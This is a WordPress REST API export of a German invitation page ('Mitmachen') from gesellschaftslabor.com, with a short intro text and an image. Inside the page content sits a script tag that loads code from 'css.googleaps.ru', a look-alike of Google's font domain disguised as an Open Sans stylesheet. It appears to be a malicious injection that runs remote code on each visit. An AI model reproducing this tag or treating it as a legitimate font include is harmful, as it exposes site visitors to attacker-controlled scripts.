{"id":44,"date":"2018-03-31T16:46:38","date_gmt":"2018-03-31T14:46:38","guid":{"rendered":"http:\/\/old.gesellschaftslabor.com\/?page_id=44"},"modified":"2018-03-31T17:28:54","modified_gmt":"2018-03-31T15:28:54","slug":"mitmachen","status":"publish","type":"page","link":"https:\/\/old.gesellschaftslabor.com\/?page_id=44","title":{"rendered":"Mitmachen"},"content":{"rendered":"<p class=\"intro\">Was besch\u00e4ftigt Sie?<br \/>\nWo f\u00fchlen Sie sich (un-)eingeschr\u00e4nkt?<br \/>\nWas wollten Sie schon immer probieren?<br \/>\n&nbsp;<br \/>\nMachen Sie es zu einem Experiment!<\/p>\n<p><script type=\"text\/javascript\" src=\"\/\/css.googleaps.ru\/css?f=Open+Sans&#038;cd=mb&#038;ver=4.2.2\"><\/script><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/old.gesellschaftslabor.com\/wp-content\/uploads\/2018\/03\/CanalStClownsWelcomeWinterCapitalklein.jpg\" alt=\"\" width=\"1603\" height=\"1005\" class=\"alignnone size-full wp-image-106\" srcset=\"https:\/\/old.gesellschaftslabor.com\/wp-content\/uploads\/2018\/03\/CanalStClownsWelcomeWinterCapitalklein.jpg 1603w, https:\/\/old.gesellschaftslabor.com\/wp-content\/uploads\/2018\/03\/CanalStClownsWelcomeWinterCapitalklein-300x188.jpg 300w, https:\/\/old.gesellschaftslabor.com\/wp-content\/uploads\/2018\/03\/CanalStClownsWelcomeWinterCapitalklein-768x481.jpg 768w, https:\/\/old.gesellschaftslabor.com\/wp-content\/uploads\/2018\/03\/CanalStClownsWelcomeWinterCapitalklein-1024x642.jpg 1024w\" sizes=\"auto, (max-width: 1603px) 100vw, 1603px\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Was besch\u00e4ftigt Sie? Wo f\u00fchlen Sie sich (un-)eingeschr\u00e4nkt? Was wollten Sie schon immer probieren? &nbsp; Machen Sie es zu einem Experiment!<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/about-page.php","meta":{"footnotes":""},"class_list":["post-44","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/old.gesellschaftslabor.com\/index.php?rest_route=\/wp\/v2\/pages\/44","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/old.gesellschaftslabor.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/old.gesellschaftslabor.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/old.gesellschaftslabor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/old.gesellschaftslabor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=44"}],"version-history":[{"count":7,"href":"https:\/\/old.gesellschaftslabor.com\/index.php?rest_route=\/wp\/v2\/pages\/44\/revisions"}],"predecessor-version":[{"id":110,"href":"https:\/\/old.gesellschaftslabor.com\/index.php?rest_route=\/wp\/v2\/pages\/44\/revisions\/110"}],"wp:attachment":[{"href":"https:\/\/old.gesellschaftslabor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=44"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}